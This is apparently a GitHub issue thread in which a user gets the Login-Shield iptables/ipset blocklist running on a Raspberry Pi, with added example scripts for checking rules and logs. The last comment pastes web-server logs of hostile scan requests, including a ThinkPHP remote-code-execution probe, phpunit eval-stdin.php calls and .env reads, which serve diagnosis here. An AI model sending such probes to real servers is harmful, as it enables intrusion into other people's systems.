DPsystems / Login-Shield

Your first line of defense against Internet bots, hacks and probes. Login-Shield is a small set of bash scripts that implements an iptables/ipset blocklist of known sources of hack activity. Works great as a complement with/without fail2ban. Statistics have shown it blocks 90+% of most system probes and attacks on login ports.

New to Login-Shield, need some help #4

Closed aakerbeere closed 3 years ago

aakerbeere commented 3 years ago

Hi, I am trying to set up Login-Shield on RPI4B, 64bit OS, Buster, as suggested at "https://github.com/DPsystems/Login-Shield/blob/master/INSTALL". When it comes to "sudo ./blacklist-main-nonUS.sh" I get errors like "./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found" and "./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" unexpected (expecting "then")". I don't know if it's me doing something wrong or if this is not suitable at all for my needs. thx for helping.

ychaouche commented 3 years ago

24 days; no reply ?

aakerbeere commented 3 years ago

Yes, sadly no reply yet :-(

On 26 Apr 2021, 11:59, Yassine Chaouche @.***> wrote:

24 days; no reply ?


DPsystems commented 3 years ago

Sorry, I missed this.

The errors you're getting appear to be the result of using the wrong shell. If you're using /bin/sh try /bin/bash or wherever your shell is located.

DPsystems commented 3 years ago

I believe the shell script I am using is bash. Run "whereis bash" and then execute that command before running the script, like /usr/bin/bash

aakerbeere commented 3 years ago

Got it, thx

When adding blacklists I get, for example:

Blacklisting 96.127.128.0/18
ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6
The set with the given name does not exist

Don't know if this is expected.

and when enabling I get

Running: set-iptables.sh
....
Continue (Y/n)? Yes
Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP
iptables v1.8.2 (nf_tables): Set login-shield doesn't exist.
Try `iptables -h' or 'iptables --help' for more information.
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn
iptables v1.8.2 (nf_tables): Set login-shield doesn't exist.
Try `iptables -h' or 'iptables --help' for more information.
Done.

Correct?

thx for helping

DPsystems commented 3 years ago

Before setting up iptables, you have to define the ipset lists. There must have been an error initially creating the ipset list? There's a specific order you need to run the commands in.

step 1: create the ipset list
step 2: run the blacklist* scripts to add IPs to the blacklists
step 3: set iptables to use the ipset lists

maybe step 1 wasn't done?

aakerbeere commented 3 years ago

I strictly followed the INSTALL instructions. Should I start over?

DPsystems commented 3 years ago

Did you get an error message when running ./create-blacklist.sh?

Do you have ipset installed?

What do you get when you run the command: ipset list | grep -i name ?

There should be a set called "login-shield".

If there isn't something is going wrong creating the ipset list.

aakerbeere commented 3 years ago

Did you get an error message when running ./create-blacklist.sh? I don't remember. I would say no. Otherwise I would have been looking for it. Can I run the script again?

ipset/stable,now 6.38-1.2 arm64 [installed]

$ ipset list | grep -i name
ipset v6.38: Kernel error received: Operation not permitted
***@:~ $ sudo ipset list | grep -i name
-> empty output

Many thanks for helping. I appreciate it.

aakerbeere commented 3 years ago

Should I try to run all this as root, not only with sudo?

DPsystems commented 3 years ago

Yes, all this stuff needs to be run as root.

DPsystems commented 3 years ago

By the way, when you run into stuff like this, be sure to identify what OS/version you're running.

DPsystems commented 3 years ago

The command (as root) you want to execute is:

ipset -exist create login-shield hash:net

It looks like the ipset list isn't being created for some reason.

ychaouche commented 3 years ago

@DPsystems did you pay attention to this error message ?

ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6

reference : https://github.com/DPsystems/Login-Shield/issues/4#issuecomment-827621709

aakerbeere commented 3 years ago

Yes I did. Couldn't find helpful information about this yet. I actually don't know how to proceed. thx

ychaouche commented 3 years ago

@aakerbeere it seems you have a version mismatch between what is supported in your kernel and what is used in the tools (ipset and/or iptables). Either a kernel upgrade or an application downgrade would be a possible solution.

aakerbeere commented 3 years ago

thx DPsystems and ychaouche

I finally started over by running all the scripts from the INSTALL-Instructions as root, not only sudo. This seems to have done it:

Continue (Y/n)? Yes
Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP
iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn

and as well

ipset list | grep -i name
Name: login-shield

Happy now. Many thanks.

ychaouche commented 3 years ago

There could have been a system update in the meantime that resolved the problem. Anyway, happy to hear it's working for you :)

aakerbeere commented 3 years ago

One question remaining from the INSTALL instructions: "NOTE: This is not persistent unless you make it persistent." and "If you want to set up login-shield to run automatically at boot time, that's beyond the scope of this guide. But it's obviously not terribly difficult to do."

Does this mean "set-iptables.sh" has to be run at boot? If I'm right I will set up a crontab entry.

thx

ychaouche commented 3 years ago

You should run create-blacklist.sh, any number of blacklist-* scripts of your choice, and set-iptables.sh, in that order. You can put those in a single script and run that instead.

$ cat loginshield.sh 
sudo ./create-blacklist.sh 
# any number of these below
# sudo ./blacklist-main-nonUS.sh
# sudo ./blacklist-others.sh
# sudo ./blacklist-proxies.sh
# sudo ./blacklist-US-hosting.sh
sudo ./set-iptables.sh
$ 

You can either create a crontab entry for your script with the special @reboot time specification (not supported by all crontab versions), or simply call your script from /etc/rc.local, which is executed after booting.

SomePersonSomeWhereInTheWorld commented 3 years ago

sudo ./create-blacklist.sh
# any number of these below
# sudo ./blacklist-main-nonUS.sh
# sudo ./blacklist-others.sh
# sudo ./blacklist-proxies.sh
# sudo ./blacklist-US-hosting.sh
sudo ./set-iptables.sh

Well you need to reference the full path to these files and then you have to create a way to automatically respond with "yes".

ychaouche commented 3 years ago

Maybe

# pipe the answer into the script run under sudo; "sudo echo" would only elevate echo
echo yes | sudo /path/to/create-blacklist.sh
echo yes | sudo /path/to/blacklist-main-nonUS.sh
echo yes | sudo /path/to/blacklist-others.sh
echo yes | sudo /path/to/blacklist-proxies.sh
echo yes | sudo /path/to/blacklist-US-hosting.sh
echo yes | sudo /path/to/set-iptables.sh

(not tested)

aakerbeere commented 3 years ago

sry RobbieTheK

I accidentally submitted the comment.

thx ychaouche

I attempted to set it up using crontab. It didn't work. Probably Raspberry's crontab does not support @reboot. So I set up "rc.local". Actually the script looks like this:

#!/bin/sh -e
cd /usr/local/bin/Login-Shield-master
echo | ./create-blacklist.sh
echo | ./blacklist-main-nonUS.sh
echo | ./blacklist-others.sh
echo | ./blacklist-proxies.sh
echo | ./blacklist-US-hosting.sh
echo | ./set-iptables.sh
exit 0

Because the scripts affected need confirmation to continue, I needed each appropriate call to be preceded by "echo | ". After reboot:

ipset list | grep -i name
Name: login-shield

So is "Login-Shield" successfully set up, or am I always missing something?

Thx to all spending time to help me.

ychaouche commented 3 years ago

You should be good I guess. I don't know if this is also another good way to check:

iptables -L --match-set login-shield

Where login-shield rules should be listed.

aakerbeere commented 3 years ago

Raspberry must be using a different package. I get

iptables v1.8.2 (nf_tables): unknown option "--match-set"
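Added here as an example, not from the thread or the Login-Shield project: with the nf_tables build of iptables, `-L` takes no `--match-set` option, but `iptables -S INPUT` lists the INPUT rules in command form, and that listing can be parsed to confirm the two rules set-iptables.sh inserts. The check also verifies the order: both rules are added with `-I`, so the LOG rule inserted last must sit above the DROP rule, otherwise packets are dropped before the LOG rule sees them and nothing with the ShD-Lgn prefix ever reaches syslog. The listings in the block are constructed; SET_NAME and LOG_PREFIX are the values shown in this thread.

```shell
#!/bin/sh
# Added example (not part of Login-Shield): check the two rules that
# set-iptables.sh inserts by parsing "iptables -S INPUT" text, which the
# nf_tables-backed iptables in this thread supports, unlike "-L --match-set".

SET_NAME="login-shield"   # values from set-iptables.sh as shown in the thread
LOG_PREFIX="ShD-Lgn"

# Constructed listing in the shape "iptables -S INPUT" prints after
# set-iptables.sh ran: both rules were inserted at the top with -I, so the
# LOG rule, inserted last, sits above the DROP rule. The conntrack line
# stands in for whatever else the host already had.
SAMPLE_RULES_OK='-P INPUT ACCEPT
-A INPUT -p tcp -m multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix "ShD-Lgn"
-A INPUT -p tcp -m multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT'

# Constructed failure case: DROP above LOG. Packets are still dropped, but the
# LOG rule never sees them, so syslog stays empty and attack_stats.sh reports
# 0 blocked attacks even though the shield is working.
SAMPLE_RULES_DROP_FIRST='-P INPUT ACCEPT
-A INPUT -p tcp -m multiport --dports 22 -m set --match-set login-shield src -j DROP
-A INPUT -p tcp -m multiport --dports 22 -m set --match-set login-shield src -j LOG --log-prefix "ShD-Lgn"'

# Read an "iptables -S INPUT" listing on stdin. Exit 0 and print "ok" only
# when a LOG rule (with the expected prefix) and a DROP rule both match the
# set and the LOG rule precedes the DROP rule; otherwise print why and exit 1.
check_shield_rules() {
  awk -v set="$SET_NAME" -v pfx="$LOG_PREFIX" '
    index($0, "--match-set " set " src") == 0 { next }
    / -j LOG / && index($0, pfx) > 0 { logln = NR }
    / -j DROP$/                      { dropln = NR }
    END {
      if (!logln)  { print "missing LOG rule for set " set;  exit 1 }
      if (!dropln) { print "missing DROP rule for set " set; exit 1 }
      if (logln > dropln) { print "LOG rule is below DROP rule: blocks will not be logged"; exit 1 }
      print "ok: LOG rule (line " logln ") precedes DROP rule (line " dropln ")"
    }'
}

# Usage: "sh check-shield-rules.sh live" (as root) inspects the running
# firewall; with no argument the two constructed listings are checked.
if [ "${1:-}" = "live" ]; then
  iptables -S INPUT | check_shield_rules
else
  printf '%s\n' "$SAMPLE_RULES_OK" | check_shield_rules
  printf '%s\n' "$SAMPLE_RULES_DROP_FIRST" | check_shield_rules || echo "(expected: the misordered sample fails)"
fi
```

Run with `live` from the boot-time wrapper or from cron after set-iptables.sh; a non-zero exit is a cheap signal that the shield rules are missing or misordered.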

SomePersonSomeWhereInTheWorld commented 3 years ago

sudo echo yes | /path/to/create-blacklist.sh
sudo echo yes | /path/to/blacklist-main-nonUS.sh
sudo echo yes | /path/to/blacklist-others.sh
sudo echo yes | /path/to/blacklist-proxies.sh
sudo echo yes | /path/to/blacklist-US-hosting.sh
sudo echo yes | /path/to/set-iptables.sh

Well you have to then edit each blacklist script with the correct/full path to the respective ipset script otherwise you get:

#######
#
Adding ./ipset-main-nonUS.lst to the login-shield blacklist, which contains cat: ./ipset-main-nonUS.lst: No such file or directory
0 IP blocks.
head: cannot open './ipset-main-nonUS.lst' for reading: No such file or directory
Yes
/root/Login-Shield/blacklist-main-nonUS.sh: line 56: ./ipset-main-nonUS.lst: No such file or directory
## end.
#######
#
Adding ./ipset-others.lst to the login-shield blacklist, which contains cat: ./ipset-others.lst: No such file or directory
0 IP blocks.
head: cannot open './ipset-others.lst' for reading: No such file or directory
Yes
/root/Login-Shield/blacklist-others.sh: line 54: ./ipset-others.lst: No such file or directory

DPsystems commented 3 years ago

Thanks for helping diagnose this!

Yes, basically login-shield is manually enabled by default. I don't have it set up to automatically run when the server reboots. Since this is a system that has the potential to lock you out of remote server access, I feel by default I shouldn't hook it into startup, but once you test the system and make sure the blacklists you use are acceptable, then you can automate the process. I tend to manually reboot my servers, so I manually re-run the commands. I still consider the system in beta right now so it needs a bit more polish but really appreciate everybody helping!

aakerbeere commented 3 years ago

Having some doubts, I did some further investigation and found

systemctl status rc-local.service
● rc-local.service - /etc/rc.local Compatibility
   Loaded: loaded (/etc/systemd/system/rc-local.service; enabled-runtime; vendor preset: enabled)
  Drop-In: /lib/systemd/system/rc-local.service.d
           └─debian.conf
           /etc/systemd/system/rc-local.service.d
           └─ttyoutput.conf
   Active: failed (Result: exit-code) since Wed 2021-04-28 21:04:36 CEST; 30s ago
  Process: 3556 ExecStart=/etc/rc.local start (code=exited, status=2)

Apr 28 21:04:36 rpi4nc systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 21:04:36 rpi4nc rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found
Apr 28 21:04:36 rpi4nc rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" une
Apr 28 21:04:36 rpi4nc systemd[1]: rc-local.service: Control process exited, code=exited, status=2/INVALIDARGUMENT
Apr 28 21:04:36 rpi4nc systemd[1]: rc-local.service: Failed with result 'exit-code'.
Apr 28 21:04:36 rpi4nc systemd[1]: Failed to start /etc/rc.local Compatibility.

and in "syslog"

Apr 28 21:04:36 localhost systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" unexpected (expecting "then")
Apr 28 21:04:36 localhost systemd[1]: rc-local.service: Control process exited, code=exited, status=2/INVALIDARGUMENT
Apr 28 21:04:36 localhost systemd[1]: rc-local.service: Failed with result 'exit-code'.
Apr 28 21:04:36 localhost systemd[1]: Failed to start /etc/rc.local Compatibility.

So this does not seem to run as expected.

SomePersonSomeWhereInTheWorld commented 3 years ago

Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" unexpected (expecting "then")

Put the full path to the file, e.g., echo yes | /root/Login-Shield/blacklist-main-nonUS.sh

DPsystems commented 3 years ago

Looks like a shell/reference issue. I believe the scripts were written using bash.

aakerbeere commented 3 years ago

I did some changes to "/etc/rc.local":

#!/bin/bash
cd /usr/local/bin/Login-Shield-master
/usr/local/bin/Login-Shield-master/create-blacklist.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-main-nonUS.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-others.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-proxies.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-US-hosting.sh
echo | /usr/local/bin/Login-Shield-master/set-iptables.sh
exit 0

then I get

# systemctl status rc-local.service
Warning: The unit file, source configuration file or drop-ins of rc-local.service changed on disk. Run 'systemctl daemon-reload' to reload units.
● rc-local.service - /etc/rc.local Compatibility
   Loaded: loaded (/etc/systemd/system/rc-local.service; enabled-runtime; vendor preset: enabled)
  Drop-In: /lib/systemd/system/rc-local.service.d
           └─debian.conf
           /etc/systemd/system/rc-local.service.d
           └─ttyoutput.conf
   Active: active (exited) since Wed 2021-04-28 22:04:39 CEST; 37s ago
  Process: 667 ExecStart=/etc/rc.local start (code=exited, status=0/SUCCESS)

Apr 28 22:04:37 ****** systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 22:04:38 ****** rc.local[667]: ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6
Apr 28 22:04:38 ****** rc.local[667]: Element cannot be added to the set: it's already added
Apr 28 22:04:39 ****** systemd[1]: Started /etc/rc.local Compatibility.

When doing systemctl daemon-reload the warning disappears but does not survive reboot. And again there is a strange Kernel support protocol versions confusion.

aakerbeere commented 3 years ago

So I configured this as a service. After reboot I get

# systemctl status loginshield.service
● loginshield.service - Login-Shield service
   Loaded: loaded (/etc/systemd/system/loginshield.service; enabled; vendor preset: enabled)
   Active: inactive (dead) since Wed 2021-04-28 23:37:56 CEST; 49s ago
  Process: 655 ExecStart=/usr/local/bin/Login-Shield-master/loginshield.sh (code=exited, status=0/SUCCESS)
 Main PID: 655 (code=exited, status=0/SUCCESS)

Apr 28 23:37:56 rpi4nc loginshield.sh[655]: #  This script will enable the LOGIN-SHIELD IP blacklist via IPTABLES
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: #
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: # WARNING:  This can cause you to lose connectivity to your server if not properly configured!
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: #
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: Yes
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: ## Done.
Apr 28 23:37:56 rpi4nc systemd[1]: loginshield.service: Succeeded.

I guess the inactive (dead) output is expected because the script comes to a successful end and then terminates, with nothing more to do.

Maybe successful this time?

DPsystems commented 3 years ago

I don't know. I've never configured it as a service before. Sounds interesting... let us know how it works!

ychaouche commented 3 years ago

Status=0/SUCCESS

  Process: 655 ExecStart=/usr/local/bin/Login-Shield-master/loginshield.sh (code=exited, status=0/SUCCESS)
 Main PID: 655 (code=exited, status=0/SUCCESS)

Also pay attention to this line :

Apr 28 22:04:38 ****** rc.local[667]: Element cannot be added to the set: it's already added

This probably means you have run the script once and it succeeded adding the ruleset, then you ran it again? I don't know if @DPsystems has code to detect that; on the other hand maybe the consequences aren't so important and can be safely ignored. But it's always better to have a clean, deterministic and consistent way to run the script, i.e. we should be covering as many cases and outcomes as possible.

aakerbeere commented 3 years ago

@ychaouche: Because I was looking for a way to have this done automatically at boot time, the scripts have been run multiple times. So, this was expected.

@DPsystems: Raspberry Pi Documentation indicates some possible drawbacks that I was probably suffering from when trying the "rc.local" method. There I also found the hint for the "systemd" method. With this I don't have any of the issues I got before with "rc.local".

But even if this is running without errors, I don't know if iptables does any blocking. Can I verify somehow, e.g. in logfiles?

thx for spending time. I appreciate it.

ychaouche commented 3 years ago

The set-iptables.sh script already has the necessary LOG instructions:

[...]
LOG_PREFIX="ShD-Lgn"
[...]
  echo "iptables -I INPUT -p tcp --match multiport --dports $BLOCK_PORTS -m set --match-set $SET_NAME src -j LOG --log-prefix $LOG_PREFIX"
  # optional command to LOG dropped connections via the kern.warning syslog service.  Comment out the iptables to disable
  iptables -I INPUT -p tcp --match multiport --dports $BLOCK_PORTS -m set --match-set $SET_NAME src -j LOG --log-prefix $LOG_PREFIX

You should look for syslog lines prefixed with ShD-Lgn

$ grep ShD-Lgn /var/log/syslog
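As an added example (not from the thread or the Login-Shield project), the grep above can be turned into a small summary of what the LOG rule is catching: total hits, hits per source address and hits per destination port. The syslog excerpt inside the block is constructed (RFC 5737 test addresses, made-up hostname and timestamps), and it includes an unrelated "[UFW BLOCK]" line so that the filter on the prefix is exercised. One detail worth knowing when grepping: iptables writes the prefix immediately before "IN=", so with LOG_PREFIX="ShD-Lgn" the logged token is "ShD-LgnIN=eth0". The default log path is an assumption for Debian-based systems such as Raspberry Pi OS, where rsyslog routes kernel messages to /var/log/syslog and /var/log/kern.log, whereas the attack_stats.sh output later in this thread reads /var/log/messages; set LOG_FILE to whichever file your rsyslog configuration uses.

```shell
#!/bin/sh
# Added example (not part of Login-Shield): summarise the iptables LOG hits
# that set-iptables.sh tags with LOG_PREFIX="ShD-Lgn". Without the "live"
# argument everything runs on the constructed sample below, so it works offline.

# Constructed syslog excerpt. iptables writes the prefix directly before
# "IN=", so with no trailing space in LOG_PREFIX the token is "ShD-LgnIN=".
# Hostname, interface, MACs and the RFC 5737 addresses are made up; the
# fourth line is an unrelated UFW entry that must be ignored.
SAMPLE_SYSLOG='Apr 30 19:10:45 rpi4nc kernel: [25003.117303] ShD-LgnIN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.168.1.20 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=1234 DF PROTO=TCP SPT=40121 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0
Apr 30 19:10:46 rpi4nc kernel: [25004.001122] ShD-LgnIN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.168.1.20 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=1235 DF PROTO=TCP SPT=40122 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0
Apr 30 19:11:02 rpi4nc kernel: [25020.556677] ShD-LgnIN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.77 DST=192.168.1.20 LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=9 DF PROTO=TCP SPT=51000 DPT=993 WINDOW=65535 RES=0x00 SYN URGP=0
Apr 30 19:11:30 rpi4nc kernel: [25048.000001] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:00:00:fb:00:08:9b:c5:82:77:08:00 SRC=192.168.1.10 DST=224.0.0.251 LEN=32 TOS=0x00 PREC=0xC0 TTL=1 ID=0 DF PROTO=2
Apr 30 19:12:00 rpi4nc kernel: [25078.123456] ShD-LgnIN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.168.1.20 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=1300 DF PROTO=TCP SPT=40200 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0'

# Number of logged blocks on stdin (what attack_stats.sh calls "blocked attacks").
count_blocks() {
  grep -c 'ShD-Lgn'
}

# Hits per source address, busiest first, as "<count> <SRC>".
summarize_sources() {
  grep 'ShD-Lgn' |
    awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^SRC=/) { sub(/^SRC=/, "", $i); n[$i]++ } }
         END { for (k in n) printf "%d %s\n", n[k], k }' |
    sort -k1,1nr -k2,2
}

# Hits per destination port, busiest first, as "<count> <DPT>": shows which
# of the shielded login ports are actually being probed.
summarize_ports() {
  grep 'ShD-Lgn' |
    awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^DPT=/) { sub(/^DPT=/, "", $i); n[$i]++ } }
         END { for (k in n) printf "%d %s\n", n[k], k }' |
    sort -k1,1nr -k2,2n
}

# Usage: "sh shield-log-summary.sh live" reads the real log; no argument
# runs the constructed sample. LOG_FILE is an assumption for Debian-based
# systems (kernel messages go to /var/log/syslog and /var/log/kern.log);
# override it, e.g. LOG_FILE=/var/log/messages, to match your rsyslog setup.
LOG_FILE="${LOG_FILE:-/var/log/syslog}"
if [ "${1:-}" = "live" ]; then
  echo "blocked: $(count_blocks < "$LOG_FILE")"
  summarize_sources < "$LOG_FILE"
  summarize_ports < "$LOG_FILE"
else
  echo "blocked: $(printf '%s\n' "$SAMPLE_SYSLOG" | count_blocks)"
  printf '%s\n' "$SAMPLE_SYSLOG" | summarize_sources
  printf '%s\n' "$SAMPLE_SYSLOG" | summarize_ports
fi
```

If the live run prints "blocked: 0" while `ipset list -n` shows the set and the iptables rules are in place, the LOG rule is either not being reached or its output is being routed to a different file than the one being read, which is worth ruling out before concluding that nothing is hitting the blocklist.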

aakerbeere commented 3 years ago

thx. Nothing yet. I will report.

ychaouche commented 3 years ago

Is this device running any popular web-facing services ? (ssh, ftp, imap, pop3, smtp, http, https)

aakerbeere commented 3 years ago

Yes, private Cloud. ssh, https

DPsystems commented 3 years ago

By default, the system logs all blocks. There are two shell scripts that will report on the status of things if properly configured to look in the appropriate logs (see attack_stats.sh and count_logins.sh).

aakerbeere commented 3 years ago

thx

$ sudo /usr/local/bin/Login-Shield-master/attack_stats.sh
...
======= Attack Statistics based on current log files =======
 Using: /var/log/messages Key: ShD-

From: Apr 25 00:00:06
To  : Apr 30 19:10:45

-- Number of blocked attacks in log files  : 0
-- Number of unique IP addresses attacking : 0
   Average # of attacks per IP             : -2147483647
   Percentage of attacks from top 50 IPs   : nan%
   Percentage of attacks from top 10 IPs   : nan%
   Percentage of attacks from top 5 IPs    : nan%

      Top 20:
Attacks:  IP Address:
---------------------

$ sudo /usr/local/bin/Login-Shield-master/count_logins.sh

...

============= Login-Shield Statistics based on current log files ===========
 Using: /var/log/messages and /var/log/secure
-- Number of login failures in log files: 0
Start: End  : ===================================== 
--        Number of filtered connections: 0
Start: Apr 25 00:00:06 localhost rsyslogd:  [origin software="rsyslogd" swVersion="8.1901.0" x-pid="442" x-info="https://www.rsyslog.com"] rsyslogd was HUPed
End  : Apr 30 19:14:55 localhost kernel: [25003.117303] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:00:00:fb:00:08:9b:c5:82:77:08:00 SRC=192.168.1.10 DST=224.0.0.251 LEN=32 TOS=0x00 PREC=0xC0 TTL=1 ID=0 DF PROTO=2 
============================================================================
Total system attacks: 0
Blocked attempts    : 0
Attacks got through : 0
---------------------------------
% Of Attacks Blocked: 100% 
============================================================================
            
DPsystems commented 3 years ago

Hmmm, make sure there are log entries in the file it's looking for (and that the prefix "ShD" is prepended to those entries according to the iptables command). I've only tested this under CentOS 7 so the logging may be slightly different for other OSes. I guess it's also possible that different systems will also log failed logins differently than what I might have in the script.

aakerbeere commented 3 years ago

Thank you DPsystems

"/var/log/messages" was already present but no entries with 'ShD'-prefix, "/var/log/secure" was not. I created it (actually empty). Login attempts are recorded in '/var/log/auth.log'

aakerbeere commented 3 years ago

I realized creating "/var/log/secure" was useless.

aakerbeere commented 3 years ago

I actually discovered plenty of connections in "/var/log/apache2/other_vhosts_access.log"

<sld>.<tld>:80 3.14.72.59 - - [01/May/2021:00:22:42 +0200] "GET / HTTP/1.1" 400 0 "-" "-"
<sld>.<tld>:80 89.163.146.178 - - [01/May/2021:00:37:36 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
<sld>.<tld>:80 193.46.255.97 - - [01/May/2021:01:10:42 +0200] "HEAD /robots.txt HTTP/1.0" 301 351 "-" "-"
<sld>.<tld>:80 89.238.223.30 - - [01/May/2021:01:22:43 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
<sld>.<tld>:80 167.99.186.47 - - [01/May/2021:01:27:11 +0200] "GET /.env HTTP/1.1" 301 721 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
<sld>.<tld>:80 138.197.122.201 - - [01/May/2021:01:30:17 +0200] "GET / HTTP/1.1" 301 657 "-" "curl/7.58.0"
<sld>.<tld>:80 178.72.68.214 - - [01/May/2021:02:01:36 +0200] "POST /HNAP1/ HTTP/1.0" 301 688 "-" "-"
<sld>.<tld>:80 89.248.165.182 - - [01/May/2021:02:03:55 +0200] "GET /level/15/exec/-/sh/run/CR HTTP/1.1" 301 726 "-" "libwww-perl/6.46"
<sld>.<tld>:80 128.14.133.58 - - [01/May/2021:02:07:27 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "POST /api/jsonws/invoke HTTP/1.1" 301 710 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 301 912 "-" "Mozilla/5.0 (Windows NT 10.0; Wi$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 736 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 301 766 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 301 734 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 776 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.39$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 776 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.390$
